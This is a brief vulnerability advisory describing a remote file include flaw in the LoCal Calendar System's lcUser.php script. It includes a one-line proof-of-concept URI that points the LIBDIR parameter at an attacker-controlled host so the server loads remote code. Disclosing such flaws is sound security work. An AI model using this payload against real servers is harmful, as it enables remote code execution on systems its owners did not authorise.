LoCal Calendar System LcUser.PHP Remote File Include Vulnerability

LoCal Calendar System LcUser.PHP Remote File Include Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI demonstrates this vulnerability:

local/lib/lcUser.php?LIBDIR=http://www.example.com/attacker_file